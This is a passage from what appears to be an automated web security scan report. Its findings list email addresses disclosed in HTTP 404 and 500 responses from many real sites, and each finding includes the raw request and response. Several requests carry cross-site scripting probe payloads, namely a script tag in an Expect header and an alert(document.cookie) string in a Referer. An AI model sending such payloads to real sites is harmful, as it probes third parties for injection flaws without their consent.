Host: www.duplinschools.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Date: Tue, 03 May 2011 10:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3266
Content-Type: text/html
Cache-control: private

<html>
<head>
<Title>Page not found</Title>
</head>
<body bgcolor=white>

<center>
<TABLE border="0" cellPadding="5" cellSpacing="0" width="100%" align="center">
<TBODY>

...[SNIP]...
<A HREF="mailto:contactus@duplinschools.net">
contactus@duplinschools.net
</A>
...[SNIP]...

23.18. http://www.fateback.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fateback.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

info@fateback.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fateback.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:45 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21859

<html>
<head>
<TITLE>Domain hosting and multiple domain hosting with free domain names</TITLE>
<META content="2 domain hosting plans with free domain name or transfer, free web template and free web d
...[SNIP]...
<META content=info@fateback.com name=Creator>
...[SNIP]...

23.19. http://www.fb2share.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fb2share.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@fb2share.movieseeker.us

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fb2share.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 10:34:21 GMT
Server: Apache
Content-Length: 684
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
webmaster@fb2share.movieseeker.us and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

23.20. http://www.feetpics.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.feetpics.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.feetpics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:08:28 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 325

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.21. http://www.freehairypusssy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freehairypusssy.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

root@ndu031.xpower.net

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freehairypusssy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.34
Date: Tue, 03 May 2011 11:31:51 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Tue, 03 May 2011 11:31:51 GMT
Content-Length: 1028

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu031.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu031.xpower.net">
...[SNIP]...

23.22. http://www.freemomsvideo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freemomsvideo.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freemomsvideo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:01:26 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 503

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.23. http://www.getfreedental.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getfreedental.com
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Comments@GetFreeDental.com
comments@getfreedental.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getfreedental.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.24. http://www.ghettodoorway.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ghettodoorway.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

cs@adultdoorway.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ghettodoorway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Tue, 03 May 2011 10:17:04 GMT
Content-Type: text/html
Content-Length: 5120
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div style="font-family:arial; font-size:14px; float:left;">
cs@adultdoorway.com
</div>
...[SNIP]...

23.25. http://www.greatnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatnow.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

admin@0catch.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:22:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<!--
DOCUMENT_ROOT = /home/catch/htdocs
GATEWAY_INTERFACE = CGI/1.1
HTTP_ACCEPT = */*
HTTP_CACHE_CONTROL = max-age=259200
HTTP_CONNECTION = keep-alive
HTTP_HOST = greatnow.com
HTTP_USER_AGENT = curl/7
...[SNIP]...
con.ico
SCRIPT_FILENAME = /home/catch/cgi-bin/parse.pl
SCRIPT_NAME = /favicon.ico
SCRIPT_URI = http://www.greatnow.com/favicon.ico
SCRIPT_URL = /favicon.ico
SERVER_ADDR = 192.168.100.12
SERVER_ADMIN = admin@0catch.com
SERVER_NAME = www.greatnow.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SIGNATURE =
SERVER_SOFTWARE = Apache
THIS IS THE FILE: /catchusers1/gr/ea/tn/ow.com/favicon.ico<BR>
...[SNIP]...

23.26. http://www.gwinnettcounty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gwinnettcounty.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@gwinnettcounty.com

Request

Response

23.27. http://www.hairyholess.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hairyholess.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

root@ndu031.xpower.net

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyholess.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.34
Date: Tue, 03 May 2011 10:19:42 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Tue, 03 May 2011 10:19:42 GMT
Content-Length: 1024

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu031.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu031.xpower.net">
...[SNIP]...

23.28. http://www.hasoid-asian.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hasoid-asian.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

root@ndu034.xpower.net

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hasoid-asian.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.19
Date: Tue, 03 May 2011 10:18:59 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Tue, 03 May 2011 10:18:59 GMT
Content-Length: 1025

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu034.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu034.xpower.net">
...[SNIP]...

23.29. http://www.herehard.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.herehard.tv
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

abuse@teenax.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herehard.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.1
Date: Tue, 03 May 2011 11:25:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8829
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:25:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Hard Movies</title>
<!-- SRC
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20herehard.tv">
...[SNIP]...

23.30. http://www.heresquirt.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heresquirt.tv
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

abuse@teenax.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heresquirt.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:20:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8746
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:20:20 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - Here Squirt Movies</title>
<!-- S
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20heresquirt.tv">
...[SNIP]...

23.31. http://www.humiliation-of-slave.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.humiliation-of-slave.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@humiliation-of-slave.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.humiliation-of-slave.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Tue, 03 May 2011 10:53:15 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 685

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
webmaster@humiliation-of-slave.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

23.32. http://www.hziegler.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hziegler.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

hza@hziegler.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hziegler.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:36:00 GMT
Server: Apache/1.3.41 (Darwin) mod_jk/1.2.6 DAV/1.0.3 mod_ssl/2.8.31 OpenSSL/0.9.7l
Last-Modified: Mon, 02 May 2011 20:12:19 GMT
ETag: "150aee2-9233-4dbf1023;4dbf1023"
Accept-Ranges: bytes
Content-Length: 37427
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><
...[SNIP]...
<a href="mailto:hza@hziegler.com?subject=Inquiring%20about%20jobs%20in%20the%20Middle%20East">hza@hziegler.com</a>
...[SNIP]...

23.33. http://www.innogames.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.innogames.de
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

support@topconcepts.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.innogames.de
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 03 May 2011 10:49:00 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Tue, 03 May 2011 10:49:00 GMT
Content-Length: 1042

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:support@topconcepts.com" />
...[SNIP]...
<a href="mailto:support@topconcepts.com">
...[SNIP]...

23.34. http://www.interstatemusic.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interstatemusic.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

customerservice@interstatemusic.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.interstatemusic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:02:27 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 18:09:07 GMT
ETag: "53d77-f77-885396c0"
Accept-Ranges: bytes
Content-Length: 3959
Connection: close
Content-Type: text/html; charset=windows-1252

<html>
<head>
<title>Page Not Available</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<table width="980" border="0" cellspacing="0" cellpadding=
...[SNIP]...
<area shape="rect" coords="837,477,956,494" href="mailto:customerservice@interstatemusic.com" alt="Email Customer Service">
...[SNIP]...

23.35. http://www.ipodarcade.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ipodarcade.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@ipodarcade.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ipodarcade.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:47:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=0, no-store
Content-Type: text/html
Content-Length: 5287

<!DOCTYPE html>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

   <title>iPod Arcade | Free iPod Games | Games for your iPod</title>

   <link href="/css/global.css"
...[SNIP]...
<a href="mailto:webmaster@ipodarcade.com">
...[SNIP]...

23.36. http://www.ius.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ius.edu
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

admissions@ius.edu
bursar@ius.edu
campuslife@ius.edu
financialaid@ius.edu
helpdesk@ius.edu
iuswrite@ius.edu
jkanning@ius.edu
liveon@ius.edu
registrar@ius.edu
seacdsc@ius.edu
sepolice@ius.edu
serefdsk@ius.edu

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ius.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 16595
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:52:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-
...[SNIP]...
<a href="mailto:admissions@ius.edu">admissions@ius.edu</a>
...[SNIP]...
<a href="mailto:seacdsc@ius.edu">seacdsc@ius.edu</a>
...[SNIP]...
<a href="mailto:bursar@ius.edu">bursar@ius.edu</a>
...[SNIP]...
<a href="mailto:campuslife@ius.edu">campuslife@ius.edu</a>
...[SNIP]...
<a href="mailto:jkanning@ius.edu">jkanning@ius.edu</a>
...[SNIP]...
<a href="mailto:financialaid@ius.edu">financialaid@ius.edu</a>
...[SNIP]...
<a href="mailto:helpdesk@ius.edu">helpdesk@ius.edu</a>
...[SNIP]...
<a href="mailto:sepolice@ius.edu">serefdsk@ius.edu</a>
...[SNIP]...
<a href="mailto:sepolice@ius.edu">sepolice@ius.edu</a>
...[SNIP]...
<a href="mailto:registrar@ius.edu">registrar@ius.edu</a>
...[SNIP]...
<a href="mailto:liveon@ius.edu">liveon@ius.edu</a>
...[SNIP]...
<a href="mailto:iuswrite@ius.edu">iuswrite@ius.edu</a>
...[SNIP]...

23.37. http://www.legendamateurs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.legendamateurs.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.legendamateurs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:36:04 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 331

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.38. http://www.mature-better.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mature-better.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mature-better.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:07:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 330

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.39. http://www.maysville-online.com/content/tncms/live/global/resources/scripts/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/content/tncms/live/global/resources/scripts/common.js

Issue detail

The following email address was disclosed in the response:

rdavis@qctimes.com

Request

GET /content/tncms/live/global/resources/scripts/common.js HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: application/x-javascript
Date: Tue, 03 May 2011 15:38:29 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1729775277"
Last-Modified: Thu, 06 May 2010 23:07:14 GMT
Real-Hostname: maysville-online.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 20504

/*
   Lee Common JS
   Last Update: 5/5/2010
   Author: Ryan Davis <rdavis@qctimes.com>
*/

// cookie plugin
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from
...[SNIP]...

23.40. http://www.maysville-online.com/content/tncms/live/global/resources/scripts/facebox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/content/tncms/live/global/resources/scripts/facebox.js

Issue detail

The following email address was disclosed in the response:

chris@ozmm.org

Request

GET /content/tncms/live/global/resources/scripts/facebox.js HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: application/x-javascript
Date: Tue, 03 May 2011 15:38:29 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "59428429"
Last-Modified: Wed, 18 Nov 2009 20:18:05 GMT
Real-Hostname: maysville-online.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 9423

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

23.41. http://www.maysville-online.com/content/tncms/live/global/resources/styles/skin.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maysville-online.com
Path:	/content/tncms/live/global/resources/styles/skin.css

Issue detail

The following email address was disclosed in the response:

rdavis@qctimes.com

Request

GET /content/tncms/live/global/resources/styles/skin.css HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: text/css
Date: Tue, 03 May 2011 15:33:59 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1695147597"
Last-Modified: Mon, 04 Jan 2010 15:00:35 GMT
Real-Hostname: maysville-online.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 31283

/*
   LEE BASE CSS
   Author: Ryan Davis <rdavis@qctimes.com>
   Last Update: 11/3/2009
*/
@import url('reset_960.css');
@import url('facebox.css');

body {
   font-size: 13px;
   text-align: center;
   backgrou
...[SNIP]...

23.42. http://www.metroguide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metroguide.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@metroguide.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metroguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "webmaster@metroguide.com" on "2008.10.18T11:47-0400" exp "2009.10.18T12:00-0400" r (v 0 s 0 n 0 l 0))
Date: Tue, 03 May 2011 10:52:02 GMT

23.43. http://www.metroparks.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metroparks.org
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

email@metroparks.org

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metroparks.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 5741
Date: Tue, 03 May 2011 11:23:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lynoic551iwcgcuno2gb3445; path=/; HttpOnly
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Error
